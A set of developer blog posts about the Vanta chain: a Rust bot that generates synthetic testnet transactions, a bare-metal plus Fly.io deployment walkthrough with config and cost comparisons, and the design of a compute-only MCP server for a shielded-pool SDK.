The Vanta txbot is [`txbot/src/main.rs`](https://github.com/Dax911/vanta/blob/main/txbot/src/main.rs), a 200-line Rust loop that round-robins random spends across 114 pre-funded Z-addresses on the testnet wallet. This post is a tour of what it does, what it found, and why the synthetic-load approach is non-negotiable when you're bringing up an L1.

## The problem statement

In April 2026 I had a chain that worked.
Bitaxes were finding blocks, the explorer was rendering them, the wallet was sending and receiving. There were also days where the mempool depth was zero for hours at a time, because the only people transacting were me, and I sleep.

A pre-mainnet chain that produces empty blocks is *less debugged* than one with mempool pressure. Things you don't notice when blocks are empty:

- Fee estimation has nothing to estimate against and falls through to `fallbackfee`.
- Coin selection is trivial when there are 12 UTXOs in the wallet. With 1,000 UTXOs across 114 addresses, you start hitting `bnb`-vs-knapsack edge cases.
- Block-template construction never sees competition between transactions. Every fee policy is moot.
- The mempool's eviction policy, ancestor/descendant limits, and policy-vs-consensus split — all untested.

The fix isn't "wait for users." Users come *after* the chain is debugged. The fix is to ship synthetic load and let the chain talk to itself.

## The bot in 200 lines

The configuration up top sets the spend envelope:

```rust
const MAX_SPEND_RATIO: f64 = 0.40;
const MIN_SPEND_RATIO: f64 = 0.05;
const MAX_OUTPUTS: usize = 12;
const MIN_DELAY_MS: u64 = 200;
const MAX_DELAY_MS: u64 = 2000;
```

Every round, the bot picks a random fraction of its current balance between 5% and 40%, splits it into 1–12 random output amounts, picks 1–12 destination addresses uniformly from the address pool, and sends. Then sleeps a random 200ms–2000ms and goes again.

The address pool is hardcoded inline as a `&[&str]` of 114 Z-prefix addresses. They're real addresses owned by the testnet wallet (the bot is running against the wallet RPC), so coins keep round-robining through the same wallet — never net leaving, just churning.

The spend loop is the simplest thing that works:

```rust
loop {
    round += 1;
    let balance = match get_balance(&rpc) {
        Ok(b) => b,
        ...
    };
    if balance < 1.0 {
        std::thread::sleep(Duration::from_secs(10));
        continue;
    }
    let spend_ratio = rng.gen_range(MIN_SPEND_RATIO..=MAX_SPEND_RATIO);
    let total_spend = balance * spend_ratio;
    let num_outputs = rng.gen_range(1..=MAX_OUTPUTS);
    let amounts = random_split(&mut rng, total_spend, num_outputs);
    // ... send each output via sendtoaddress, log txid
    let delay = rng.gen_range(MIN_DELAY_MS..=MAX_DELAY_MS);
    std::thread::sleep(Duration::from_millis(delay));
}
```

`random_split` divides the total spend into `n` pieces by sampling `n-1` uniformly random cut points. This produces uneven splits — most outputs are small, a couple are medium, occasionally one is large. That distribution is *closer to organic spending* than equal splits would be, and it stresses coin selection harder.

`sendtoaddress` is called once per output rather than once per `n`-output transaction. This was a deliberate choice: it produces more transactions per round (which is the point), and it lets the chain pick how it batches them in mempool selection.

## What it actually exercised

The bot ran for weeks against the Latitude testnet. Things it surfaced:

**Fee estimation falls through.** The first time the bot sent a transaction the call returned `"Fee estimation failed."` The fix was the now-canonical `settxfee` at startup with a 0.0001 fallback. Same line is in the [Axum web wallet's main.rs](/blog/vanta_wallet_axum_api/) for the same reason.

**Wallet RPC contention.** When the bot rate is high, multiple `sendtoaddress` calls in flight contend on the wallet's lock. The bot is single-threaded so it's only contending against itself plus whatever else uses the wallet (the web UI, occasional manual sends). The lesson: if you're going to run the bot at high rate, give it a dedicated wallet via `loadwallet`.

**Mempool eviction.** With the bot churning 5–10 transactions per round and a 1-minute block time, mempool depth would creep up during slow blocks and drain on fast blocks.
This was the first time I watched the eviction policy actually run. It's *fine* — Bitcoin Core's mempool is one of the most-tested pieces of state in the codebase — but watching it from the outside helped me build a model of how it behaves at our parameters (1-min blocks, 100k subsidy, low fee floor).

**Pool L2 retry queue.** The 2026-04-13 commit `ops: vanta-node systemd unit + docker compose + pool L2 retry queue` landed a feature where the [Stratum server's L2 submission](https://github.com/Dax911/vanta/blob/main/pool/stratum_server.py) is enqueued for retry when the L2 sidecar is unreachable. We discovered the need for that retry queue because the txbot was generating enough block-finding pressure that the pool was sometimes hitting `submitblock` while the L2 sidecar was being restarted. Without the retry queue, those blocks' encrypted notes would be lost. With it, they get replayed when the L2 comes back. That's the synthetic-load test paying for itself in a feature that ended up in the production pool code.

## Things the bot is *not* designed to be

The bot is a stress generator, not a fuzzer. It does not:

- Construct invalid transactions to test rejection paths. (That's the functional tests in `test/`.)
- Try to double-spend. (The wallet won't let it; the chain wouldn't accept it.)
- Generate shielded transactions. (No SP1 prover in the bot loop. Yet.)
- Negotiate fees adversarially. (Single fixed fallback fee.)

I have *thought* about adding all of these. The shielded-transaction one is the interesting next step. A txbot that includes some fraction of shielded sends would exercise the SMT growth path, the nullifier-set growth path, and the encrypted-note inbox at `vanta-node` — all of which currently only get exercised by manual sends from the wallet. Adding ZK proof generation to the bot loop is the trade-off though. SP1 proofs take 30–60 seconds on CPU, so a bot that does 10 sends per minute can't be all-shielded.
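Back on the transparent path, the cut-point construction behind `random_split` described earlier is small enough to sketch in full. This is my dependency-free approximation — a tiny xorshift generator stands in for the `rand` crate the bot actually uses — not the bot's exact code:

```rust
/// Minimal xorshift64 PRNG so the sketch stays dependency-free;
/// the real bot uses the `rand` crate's `gen_range` instead.
struct Xorshift(u64);

impl Xorshift {
    fn next_f64(&mut self) -> f64 {
        self.0 ^= self.0 << 13;
        self.0 ^= self.0 >> 7;
        self.0 ^= self.0 << 17;
        // top 53 bits as a uniform float in [0, 1)
        (self.0 >> 11) as f64 / (1u64 << 53) as f64
    }
}

/// Split `total` into `n` non-negative pieces: sample `n-1` uniform cut
/// points in [0, total), sort them, and take the gaps between them.
fn random_split(rng: &mut Xorshift, total: f64, n: usize) -> Vec<f64> {
    let mut cuts: Vec<f64> = (0..n.saturating_sub(1))
        .map(|_| rng.next_f64() * total)
        .collect();
    cuts.sort_by(|a, b| a.partial_cmp(b).unwrap());
    let mut pieces = Vec::with_capacity(n);
    let mut prev = 0.0;
    for c in cuts {
        pieces.push(c - prev);
        prev = c;
    }
    pieces.push(total - prev); // last gap closes the telescoping sum exactly
    pieces
}

fn main() {
    let mut rng = Xorshift(0x9E37_79B9_7F4A_7C15);
    let pieces = random_split(&mut rng, 100.0, 5);
    assert_eq!(pieces.len(), 5);
    assert!((pieces.iter().sum::<f64>() - 100.0).abs() < 1e-9);
    println!("{pieces:?}");
}
```

The skew falls out of the construction for free: sorted uniform cut points cluster, so most gaps are small and the occasional gap is large — exactly the uneven, organic-looking distribution described above.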
**TODO: Dax confirm whether we want a `--shielded-ratio 0.2` flag to mix.**

## Why not synthetic at the protocol level

A reasonable counter-design: instead of running a separate bot, make `vantad` itself emit synthetic transactions in a `regtest`-only mode. Two reasons we didn't:

1. **The bot is real.** Every transaction the bot sends is signed by a real key, broadcast through real RPC, and validated by real consensus. It exercises the same code paths a user transaction would. A built-in synthetic mode is cheaper but it is at risk of taking shortcuts that a real RPC client wouldn't take.
2. **Operational separation.** The bot is a thing I can stop, restart, retarget, or add features to without touching `vantad`. That separation matters; the consensus binary should not contain test-traffic-generation code.

The bot lives in `txbot/`, separate Cargo workspace, separate binary. The cost of that separation is a few extra lines of `bitcoincore-rpc` setup. The benefit is that I can iterate on the bot during a deploy without rebuilding the chain.

## What I would change

A list, in order of priority:

1. **Multiple workers.** A single-threaded bot maxes out around 10 tx/sec because of RPC round-trip latency. A 4-worker version with a shared rng seed would 4x the rate without changing the workload shape. Easy.
2. **Shielded mix.** As above. Adds the SP1 dependency and an L2-sidecar URL to the bot's config; cost is per-tx latency.
3. **Adversarial replacement.** Send a tx, then send a higher-fee replacement before the first confirms. Tests RBF policy. Easy.
4. **Mempool snapshot logging.** After each send, query `getmempoolinfo` and `getmempoolancestors` for the txid. Log the mempool depth and ancestor count. This produces a time series I can graph against block-find events to see how mempool pressure correlates with confirmation latency. Low priority.

The bot is also *load-bearing for the explorer*.
The 2026-04-13 commit `explorer: privacy throughput + anonymity charts (recharts)` shows transaction-count and mempool-depth charts on the explorer dashboard; those charts are flat without the bot running.

## Further reading

- [`txbot/src/main.rs`](https://github.com/Dax911/vanta/blob/main/txbot/src/main.rs) — the entire bot in one file
- [`txbot/Cargo.toml`](https://github.com/Dax911/vanta/blob/main/txbot/Cargo.toml) — dependency-light by design
- [The vanta wallet HTTP API](/blog/vanta_wallet_axum_api/) — sister piece on the Axum wallet that talks to the same RPC
- [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — the chain the bot is exercising
- [Mining VANTA with a Bitaxe BM1368](/blog/mining_vanta_with_a_bitaxe/) — the hardware that consumes the bot's mempool pressure
- [Bitcoin Core mempool docs](https://github.com/bitcoin/bitcoin/blob/master/doc/policy/mempool-replacements.md) — the policy surface the bot indirectly tests

---

# Latitude bare-metal primary, Fly.io backup: the deploy story for a 1-min-block chain

Canonical: https://blog.skill-issue.dev/blog/vanta_flytoml_latitude_baremetal/
Description: Vanta v1 went LIVE on a Latitude bare-metal box at 64.34.82.145:9333 with a Fly.io seed fleet as auto-failover. Why a 1-min-block chain hates cold starts, what the fly.toml has to say about it, and the cost math that picks bare metal.
Published: 2026-04-13T21:18:29.000Z
Tags: vanta, deploy, latitude, fly, baremetal, infra

The 2026-04-13 commit `d3d532cc deploy: vanta v1 LIVE on Latitude` is the moment Vanta moved from "regtest on a Mac mini under my desk" to "mainnet on a real-world internet host." The seed node IP — `64.34.82.145:9333` — has been the bootstrap addnode in the [desktop wallet's auto-config](/blog/vanta_tauri_ergonomics/) since that commit.

What the commit message doesn't tell you is that there's a *second* deploy target.
The `fly.toml` in the repo declares an 11-region fleet on Fly.io, hardcoded to an old `zeracoin-seed` app name. That fleet is the *backup* — the failover that the network falls back to when the bare-metal box goes down. Bare metal is primary. Fly is the safety net.

This post is the architecture, the fly.toml walk-through, the cost math that makes bare metal cheaper than equivalent Fly machines, and a candid paragraph about why a 1-minute-block chain particularly hates cold starts.

## The two-tier topology

There's a single primary bare-metal box, and a fleet of small Fly machines. The wallet's auto-config lists *both* IPs for redundancy:

```
addnode=64.34.82.145:9333   # Latitude bare metal — primary
addnode=66.241.124.138:9333 # Fly.io fleet — backup
```

The bitcoind P2P protocol picks whichever it can reach first and rotates if a peer disappears. There's nothing fancy here — Bitcoin Core's peer discovery does the work. The architecture is "primary host, secondary host, network sorts itself out."

The reason for two tiers (and not just two bare-metal boxes, or just a Fly fleet) is *operational*. Bare metal is cheap when you can give it your full attention. Bare metal is brittle when you can't — disk failures happen, ISPs renumber, hardware ages. The Fly fleet is the "I am asleep, the chain stays up" insurance.

## fly.toml, annotated

The full [`fly.toml`](https://github.com/Dax911/vanta/blob/main/fly.toml) is short. The interesting parts are below.

### App name: the rebrand artefact

```toml
app = "zeracoin-seed"
primary_region = "iad"
```

The Fly app is *still* named `zeracoin-seed` — the pre-rebrand name. Renaming a Fly app requires recreating it (you lose the IPs and volumes), and the IPs are baked into the desktop wallet's `addnode` lines. Recreating the app would force a wallet upgrade for every existing user.
The fix lives in commit [`1b72aec6`](https://github.com/Dax911/vanta/commit/1b72aec6c) — `fly: match actual app name (zeracoin-seed) + clamp grace_period` — which is the moment I committed to the rebrand-postponement and updated the deploy script to match the actual app name instead of pretending we'd already migrated. The tradeoff is: ugly artefact in `fly.toml` vs. forcing a migration every existing user has to participate in. The artefact wins.

### Kill signal and timeout

```toml
kill_signal = "SIGTERM"
kill_timeout = "120s"
```

Bitcoin Core flushes its database on shutdown. Get SIGKILL'd mid-flush and you can corrupt chainstate or block files. The 2-minute `kill_timeout` is the window we give Fly's orchestrator to wait before escalating; in practice `vantad` flushes in 10–20 seconds, so 120 is generous insurance.

Fly defaults to a 5-second `kill_timeout`. Five seconds is not enough to flush a UTXO database, full stop. Every Bitcoin-Core deploy I've seen on Fly that didn't override this had at least one chainstate-corruption incident. **Override it.**

### Volumes

```toml
[mounts]
source = "vanta_data"
destination = "/root/.vanta"
```

A persistent volume mounted at `~/.vanta` — the Bitcoin Core data dir. Fly creates one volume per machine (the volume names get auto-numbered: `vanta_data`, `vanta_data_v2`, etc). The volume survives machine restarts; only a `fly volumes destroy` deletes it.

The data dir contains chainstate, blocks, the mempool, the peers cache, and the wallet (if any). On a fresh deploy this is empty and the machine does an initial-block-download from peers; on a restart it picks up where it left off. The volume is what makes "restart a machine" cheap and "destroy a machine" expensive.

### Rolling deploy strategy

```toml
[deploy]
strategy = "rolling"
max_unavailable = 0.25
wait_timeout = "10m"
```

Rolling deploys take at most 25% of the fleet down at once.
With 11 machines spread across 11 regions, that's about 3 machines unavailable during any given deploy. The other 8 keep the network reachable for the wallet's `addnode` lookups.

`wait_timeout = "10m"` gives each machine ten minutes to come back up and pass health checks before the deploy considers it failed. Bitcoin Core sometimes takes that long to verify chainstate at startup, especially on a small machine; default Fly wait_timeout (5m) was tripping us during deploys and leaving the cluster in a partially-deployed state.

### Health checks

```toml
[[services]]
internal_port = 9333
protocol = "tcp"
auto_stop_machines = false
auto_start_machines = true

[[services.ports]]
port = 9333

[[services.tcp_checks]]
interval = "30s"
timeout = "5s"
grace_period = "1m"
```

`auto_stop_machines = false` is intentional. Fly's autostop will spin a machine down after a few minutes of no traffic. A *seed node* with no traffic is suspicious, but it's not "stop the machine" suspicious — peer discovery is bursty, and a seed that's stopped when a wallet starts up is a seed that's not doing its job.

`auto_start_machines = true` lets Fly *start* a stopped machine on a cold TCP connection. This is the safety net for any case where the autostop did fire.

`tcp_checks` is a 30-second TCP-handshake probe against port 9333. If `vantad` dies or wedges, its P2P listener goes away, the TCP check fails, and Fly restarts the machine. The `grace_period = "1m"` is the startup window where we don't penalise a machine for being mid-IBD.

`grace_period` is capped at 1m by Fly — anything higher gets clamped, which is a thing I learned by setting it to 5m and watching the deploy log it as "1m (clamped)." The 1-minute window is enough for a warm restart but not enough for a cold IBD; we work around it by not destroying machines casually.

### Sizing

```toml
[vm]
size = "shared-cpu-1x"
memory = "2gb"
swap_size_mb = 1024
```

`shared-cpu-1x` is Fly's smallest paid tier.
2 GB RAM is bumped from the default 1 GB because `txindex=1` plus the UTXO set needs headroom on a Vanta-sized chain. 1 GB swap is insurance against OOM kills during IBD bursts (specifically: the moment when the UTXO set is being loaded into memory at startup).

This is sized for a *seed* node, not a *miner* node. We don't run mining workloads on Fly. The Bitaxe rig at home is the [actual mining setup](/blog/mining_vanta_with_a_bitaxe/).

## The Latitude box

The bare-metal primary is on [Latitude.sh](https://latitude.sh), a smaller-than-OVH-but-bigger-than-Hetzner bare-metal provider with hourly billing. The spec is a single AMD Ryzen 9, 32 GB ECC RAM, 1 TB NVMe, with a /29 subnet and an unmetered 1 Gbps port. **TODO: Dax confirm the exact tier — I have it as `c2.medium.x86` but want to verify against the Latitude billing dashboard.**

What it runs:

- `vantad` — the L1 node, listening on port 9333 (P2P) and 9332 (RPC, bound to localhost).
- `vanta-node` — the L2 sidecar, listening on port 9380 for the REST API.
- `nginx` — TLS termination for the L2 REST API (port 443 → 9380).
- The Bitaxe pool (port 3333) — the home rig actually plugs into a separate machine, but the *pool stratum server* lives on the Latitude box.
- The vanta-explorer (port 80 → 8080) — block explorer.
- The fly-deploy mirror — a backup of the Fly fleet's deploy state, in case Fly itself goes down for an extended period.

This is more than a "seed node." It's the primary operational deploy of the chain. The Fly fleet is, again, the *seed fallback* — they don't run the explorer or the L2 sidecar. They just keep the P2P network reachable.

## Why a 1-minute-block chain hates cold starts

Worth dwelling on this. On Bitcoin (10-minute blocks), a node that's been off for an hour comes back up and is six blocks behind. Catching up is fast. The chain's "average" block production rate is generous enough that a 60-second startup delay is invisible.
On Vanta (1-minute blocks), an hour off is sixty blocks behind. A 60-second startup is *one full block of latency*. If the seed nodes are slow to come back up, wallet UX degrades visibly: the user opens the wallet, sees "syncing," and waits sixty seconds where Bitcoin would have synced in ten.

> **WARNING:** This is the operational property that makes Fly's autostop *dangerous* for a fast-block chain. A seed node that's been auto-stopped after 30 minutes of idle, then woken up by a wallet's first connection, takes ~15 seconds of cold start. During that 15 seconds, the wallet sees no peers and reports "L1 disconnected." This is a real user-visible regression compared to a warm seed.

The mitigations are stacked:

1. `auto_stop_machines = false` in `fly.toml` — Fly never stops the seeds.
2. The Latitude bare-metal primary handles 99% of the bootstrap traffic, so most wallets never even hit the Fly fleet.
3. The Fly fleet keeps machines warm by *each other's* P2P traffic — bitcoind's peer-keepalive interval is short enough that the machines stay active even with no client traffic.
4. The Latitude box has a [`systemd` unit](https://github.com/Dax911/vanta/blob/main/contrib/init) with `Restart=always` so any local crash recovers in under 10 seconds.

I'd not run a fast-block chain on a serverless-by-default platform. Fly is a great fit because it can be configured to behave like an always-on host. Fly's *defaults* are not.

## Cost math: Latitude vs Fly

Approximate, monthly:

| Component | Latitude (bare metal) | Equivalent Fly |
|---|---|---|
| 1× AMD Ryzen 9 (8c/16t) | ~$140 | shared-cpu-8x: ~$160 |
| 32 GB RAM | included | $80 (32 GB at $2.50/GB) |
| 1 TB NVMe | included | $150 (1 TB at $0.15/GB) |
| 1 Gbps unmetered | included | bandwidth metered, est. $30 |
| **Total per box** | **~$140** | **~$420** |

Latitude's all-included pricing for a single bare-metal box is roughly *one third* the cost of an equivalently-specced Fly machine.
The Fly fleet (11 small seeds at ~$5–$10/month each) costs another ~$80/month combined. So the total bill: Latitude $140 + Fly fleet $80 = ~$220/month for *primary + 11-region failover.* An equivalent Fly-only deploy (one big primary + 11 small seeds) would be ~$500/month for a worse outcome (no actual bare-metal performance for the L2 indexer, no NVMe write-throughput for the chainstate, no dedicated network port).

This is a textbook case for hybrid deploy. The thing you're optimising for cost on (the heavy, always-on workload) goes on bare metal. The thing you're optimising for *availability* on (the geographic-redundancy seed fleet) goes on the platform with built-in geographic distribution.

## A tradeoff table

I keep telling people to do this kind of comparison explicitly, so:

| Option | Cost (1 yr) | Latency to seed | Cold-start risk | Operational burden |
|---|---|---|---|---|
| Bare metal only (Latitude) | ~$1,700 | Variable by region (single PoP) | Low — always on | High if hardware fails |
| Fly fleet only (11 regions) | ~$5,000 | Low (regional anycast) | High if autostop is enabled | Low — managed platform |
| Hybrid (Latitude primary + Fly backup) | ~$2,600 | Low (Fly fronts geographic) | Low (primary always on) | Medium |
| DigitalOcean / Linode dedicated | ~$1,200–$2,000 | Moderate (one PoP per droplet) | Medium | Medium |
| Hetzner dedicated | ~$700–$1,400 | High (mostly EU PoPs) | Low | Medium |

The Hetzner option is genuinely tempting on cost grounds — half the price of Latitude. The reason I didn't pick it for *this* chain is that Hetzner's IP ranges are widely flagged by reputation services as "spam-adjacent" (because they're cheap and hosters use them for everything), and a small-network seed node whose IP gets transiently blocked by some random ISP's anti-spam filter is a problem I do not want.
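The yearly column above is just the monthly math annualised. As a quick sanity-check sketch (all inputs are this post's rounded monthly estimates):

```rust
// Sanity-checking the tradeoff table: yearly figures are the rough
// monthly estimates from this post, annualised.
const LATITUDE_PRIMARY: f64 = 140.0; // bare-metal box, all-included, per month
const FLY_SEED_FLEET: f64 = 80.0; // 11 small Fly seeds combined, per month

fn yearly(monthly: f64) -> f64 {
    monthly * 12.0
}

fn main() {
    let hybrid_monthly = LATITUDE_PRIMARY + FLY_SEED_FLEET;
    println!("hybrid: ${hybrid_monthly}/mo"); // $220/mo
    println!("bare metal only: ~${}/yr", yearly(LATITUDE_PRIMARY)); // 1680 ≈ the ~$1,700 row
    println!("hybrid: ~${}/yr", yearly(hybrid_monthly)); // 2640 ≈ the ~$2,600 row
}
```

Nothing deep here — the point of the table is that the arithmetic is simple enough that there is no excuse for not doing it before picking a provider.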
DigitalOcean's $40/mo "premium intel" droplets would have worked too, but the bandwidth charges add up — DO meters at $0.01/GB above the included amount, and a chain seed serving IBD to fresh nodes can easily push 100 GB/day during a busy period.

## What changes after Phase 4

Phase 4 in the [architecture roadmap](https://github.com/Dax911/vanta/blob/main/doc/vanta-architecture.md) is "full Rust node rewrite using rust-bitcoin stack." When that lands, the deploy story shifts:

- The L2 sidecar and L1 node are *one binary*, not two. Operationally that's a smaller blast radius — one PID to monitor instead of two.
- The Rust node is statically linked and ships as a single ~30 MB binary. Container size collapses.
- We can in principle deploy on smaller Fly machines (256 MB instead of 2 GB) once the C++ is gone.

But Phase 4 is the *future*. The current deploy story is "C++ node + Rust sidecar on bare metal, with a Fly fleet of C++-node-only seeds for failover."

## What I changed my mind about

I started this project assuming Fly was the right deploy target for *everything.* It's a great platform, the developer experience is unmatched on its tier, and the ergonomics of `fly deploy` after years of Kubernetes are genuinely refreshing.

The thing that changed my mind was the cold-start property. A 1-minute-block chain has a different operational profile than a request-response web service. Fly's defaults — autostop, autoresurrect on demand, regional load balancing — are tuned for a workload where 100 ms latency is fine and 5-second cold starts are tolerable. Neither is fine for a chain seed.

Once I'd configured Fly *out of* its defaults — `auto_stop_machines = false`, larger memory, longer kill_timeout, longer wait_timeout — I was running a Fly machine as if it were an always-on box. At which point: an always-on box is what bare metal *is*, at one-third the price, with a real network interface and dedicated NVMe.
The Fly fleet still has a job — geographic redundancy, multi-region warm seeds — that bare metal can't do without a substantial multi-PoP investment. So Fly stays as the backup ring. Latitude is the primary. Both are needed; neither is sufficient. ## Further reading - [`fly.toml`](https://github.com/Dax911/vanta/blob/main/fly.toml) — the Fly config this post walks - [`fly-deploy.sh`](https://github.com/Dax911/vanta/blob/main/fly-deploy.sh) — the multi-region deploy wrapper - [`doc/vanta-architecture.md`](https://github.com/Dax911/vanta/blob/main/doc/vanta-architecture.md) — the infra section in the architecture doc - [`Dockerfile`](https://github.com/Dax911/vanta/blob/main/Dockerfile) — the container both Latitude and Fly run - [Mining Vanta with a Bitaxe BM1368](/blog/mining_vanta_with_a_bitaxe/) — the home-rig side of the operation - [What running a Bitcoin mine taught me](/blog/what_running_a_bitcoin_mine_taught_me/) — the small-operator unit-economics post that informs all of this --- # The MCP server inside zera-sdk Canonical: https://blog.skill-issue.dev/blog/mcp_server_inside_zera_sdk/ Description: Most SDKs ship as a library. zera-sdk also ships as a Model Context Protocol server. Here is why an AI agent should be able to call shielded-pool primitives directly, and how we keep that interface from becoming a footgun. Published: 2026-04-08T16:42:00.000Z Tags: zera, mcp, sdk, ai-agents, rust, typescript When we [scaffolded the SDK monorepo](/blog/zera_sdk_scaffolding/) in early March, the first non-obvious decision was including an [MCP](https://modelcontextprotocol.io) server in the box. Not as an example. Not as a future-work bullet. As a first-class crate alongside the Rust core and the TypeScript surface. Six weeks later it still feels like the right call. Here is the reasoning. 
## What MCP actually is, and what it is not MCP — Model Context Protocol — is Anthropic's open JSON-RPC standard for letting LLM-driven applications call tools, read resources, and surface reusable prompts from any compliant server. By the start of 2026 there were over 10,000 public MCP servers and ~97 million SDK downloads per month across the Python and TypeScript implementations. The standard is in the boring-but-load-bearing phase: every major model vendor speaks it, the spec is on a regular cadence, the working groups have process. What MCP is *not* is "an AI feature." It is a protocol layer. The AI part is incidental. What MCP gives you is a typed, schema-described, discovery-friendly RPC surface that any client — model, CLI, IDE, agent — can connect to and immediately understand without bespoke glue. The most useful frame is *"USB-C for tool calls."* That comparison gets thrown around to the point of cliché but it is also accurate: before USB-C you wrote per-cable glue; after, the cable is part of the device. MCP does the same thing for tool surfaces. The interesting question for an SDK author in 2026 is not *"should I expose an MCP server?"* — that question is settled by the AI-agent-economy curve I wrote about [in the broadband-moment post](/blog/privacys_broadband_moment/). The interesting question is *which* surface to expose, and how to keep it from becoming a footgun. ## The tools the SDK actually exposes The first version of `zera-mcp` shipped four tools and three resources. I want to talk about each one, because the choice of what to expose is more meaningful than the protocol mechanics. ### `search_posts(query, k=5)` Wait, no — that is the *blog's* MCP server, not the SDK's. (Yes, [the blog has one too](/blog/privacys_broadband_moment/), and I am building a longer post about that. Let me get back to the SDK.) The SDK's four tools, as of [commit `e350707`](https://github.com/Dax911/zera-sdk): 1. 
**`compute_commitment(asset, amount, randomness)`** — returns a Poseidon commitment to a `(asset, amount)` pair under a caller-supplied blinding factor. This is the primitive an agent uses to *describe a payment that has not happened yet* — it can hand the commitment to a human for review without ever revealing the amount. 2. **`derive_nullifier(note_secret, commitment)`** — returns the deterministic, single-use nullifier for a previously-committed note. As discussed in [Nullifiers without the witchcraft](/blog/nullifiers_without_witchcraft/), this is the hash that proves a note has been spent without revealing which one. Agents call this during proof generation. 3. **`build_spend_proof(note, recipient, amount)`** — runs the full Groth16 prover for the canonical spend circuit and returns the proof bytes. **This is the only tool that touches the prover.** Doing this in-process via MCP is much better than asking an agent to shell out to a Rust binary; the agent gets a typed, schema-described return value with proof bytes and a public-input vector. 4. **`get_pool_state()`** — read-only resource. Returns the current root hash of the commitment Merkle tree and the count of unspent notes. Agents that want to check whether their proof is still valid against the latest pool state poll this. It is a *resource*, not a tool, in MCP terms — the difference matters for caching and for explaining to the agent that the call is side-effect-free. That is the entire surface: three tools and one read-only resource. No `transfer`, no `withdraw`, no `set_owner`. **An agent can compose payments, prove them, and inspect pool state. It cannot move funds without a human signing the resulting transaction.** That asymmetry is deliberate and I will defend it for as long as MCP exists. 
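The read-and-compute-only shape of that surface can be sketched in a few lines. This is a hedged illustration, not the actual `zera-mcp` code: `toyHash` stands in for Poseidon so the block is self-contained, the tool names mirror the list above, and every other identifier here is hypothetical.

```typescript
// Sketch of a compute-only tool surface. The asymmetry rule is encoded in the
// entry type: `mutatesPoolState` can only ever be the literal `false`, so a
// state-changing tool cannot even be registered.
type ToolHandler = (args: Record<string, bigint | string>) => bigint;

interface ToolEntry {
  handler: ToolHandler;
  mutatesPoolState: false; // literal type — `true` is unrepresentable
}

// Stand-in hash so the sketch runs anywhere (the real SDK uses Poseidon).
const toyHash = (xs: bigint[]): bigint =>
  xs.reduce((acc, x) => (acc * 1000003n + x) % ((1n << 61n) - 1n), 7n);

const tools: Record<string, ToolEntry> = {
  compute_commitment: {
    handler: ({ asset, amount, randomness }) =>
      toyHash([BigInt(asset), BigInt(amount), BigInt(randomness)]),
    mutatesPoolState: false,
  },
  derive_nullifier: {
    handler: ({ note_secret, commitment }) =>
      toyHash([BigInt(note_secret), BigInt(commitment)]),
    mutatesPoolState: false,
  },
};

// There is deliberately no `transfer` to dispatch to: authority over funds
// stays with the wallet, entirely outside this surface.
function call(name: string, args: Record<string, bigint>): bigint {
  const entry = tools[name];
  if (!entry) throw new Error(`unknown tool: ${name}`);
  return entry.handler(args);
}
```

The point of the sketch is the type of `ToolEntry`: a compromised agent can call anything in the table as often as it likes, and the worst it gets back is a hash the human can audit.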
## The asymmetry rule Every time I add a tool to `zera-mcp`, I run it through a single test: > *If the agent is compromised — adversarial prompts, model jailbreak, supply-chain payload in the tool-calling library — what is the worst it can do?* If the answer is "compute a commitment that the human can audit," fine. If the answer is "move funds," not fine. The line is **whether the tool has unilateral authority to change pool state.** The current SDK MCP draws that line at proof construction. The proof itself is just a bunch of bytes; submitting it to the chain still requires a transaction signed by a wallet that the agent does not have direct authority over. This is the same threat model I argued for in the [x402 honeypot disclosure post](/blog/x402_honeypot_disclosure/) and in [Rusty Pipes](/blog/rusty_pipes/) before that. You assume the agent is compromised. You design the surface so a compromised agent cannot drain the pool. Everything else is detail. ## What it looks like when an agent uses it Concretely, here is the flow when a user asks Claude (or ChatGPT, or any MCP-enabled client) to *"send $50 of USDC to alice.sol from my shielded balance, but show me the commitment first":* 1. The agent calls `get_pool_state()` to fetch the current Merkle root. 2. The agent picks an unspent note from the user's local wallet that is `≥ $50`. 3. The agent calls `compute_commitment(USDC, $50, fresh_randomness)` to construct the visible commitment. 4. The agent surfaces the commitment to the human in a message that says, in effect, *"here is the commitment for the $50 send to alice.sol; proceed?"* 5. The human approves. 6. The agent calls `derive_nullifier(...)` and `build_spend_proof(...)` and gets back the spend witness. 7. The agent hands the proof to the *wallet* — not to the chain — and the wallet signs and submits the transaction. The wallet has policy: it will not co-sign a proof whose public inputs have not been displayed to the human in step 4. 
Step 7 is where the privilege boundary lives. The MCP tools never touch a private key. They never broadcast a transaction. They are pure compute against pool state. ## Why this generalises I have argued for this pattern in three places now: the SDK's MCP server, the blog's MCP server, and the [proposed `lib.skill-issue.dev`](/blog/why_i_started_zera_labs/) personal MCP that exposes my writing as queryable resources. The pattern is the same in all three: > **Expose typed read + compute primitives. Do not expose state-changing authority. Push every authority decision back through the human or through a wallet that has its own policy.** If we are entering a decade where AI agents are going to be calling cryptographic primitives, this is the boundary that needs to hold. The cryptography is finally ready, the protocols are finally ready, and the *interface design* is the part that is still up for grabs. I would rather we set the precedent now than discover the right shape after the first six-figure agent-driven drain. ## What I changed my mind about When I first started writing `zera-mcp` I assumed I would expose the prover as a *resource* (cacheable, repeatable) rather than a *tool* (potentially side-effecting). The ZK community talks about provers as deterministic functions — given the same witness, you get the same proof — so it felt natural to treat them like a read. I changed my mind after watching an agent hammer the prover during testing. **The prover is computationally side-effecting even if it is mathematically pure.** Eight seconds of CPU per call adds up fast when an agent is in a loop. Resources in MCP are aggressively cached by clients; tools are not. By moving the prover behind a tool I forced the client to think about whether to call it again. Worth it. 
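The step-7 wallet policy described above — co-sign only what the human has seen — can also be sketched. This is an illustrative toy under assumed names (`PolicyWallet`, `recordApproval`, `signAndSubmit` are all hypothetical, not the real wallet's API):

```typescript
// Toy wallet policy: refuse to sign any proof whose public inputs were not
// previously displayed to and approved by the human.
interface SpendProof {
  proofBytes: Uint8Array;
  publicInputs: { commitment: bigint; amount: bigint; recipient: string };
}

class PolicyWallet {
  private approved = new Set<string>(); // keys of human-approved public inputs

  private key(p: SpendProof["publicInputs"]): string {
    return `${p.commitment}|${p.amount}|${p.recipient}`;
  }

  // Called by the UI after the human reviews the commitment (steps 4–5).
  recordApproval(inputs: SpendProof["publicInputs"]): void {
    this.approved.add(this.key(inputs));
  }

  // Called by the agent with the finished proof (step 7).
  signAndSubmit(proof: SpendProof): string {
    if (!this.approved.has(this.key(proof.publicInputs))) {
      throw new Error("policy: public inputs were never shown to the human");
    }
    return "signed-tx-placeholder"; // a real wallet would sign and broadcast
  }
}
```

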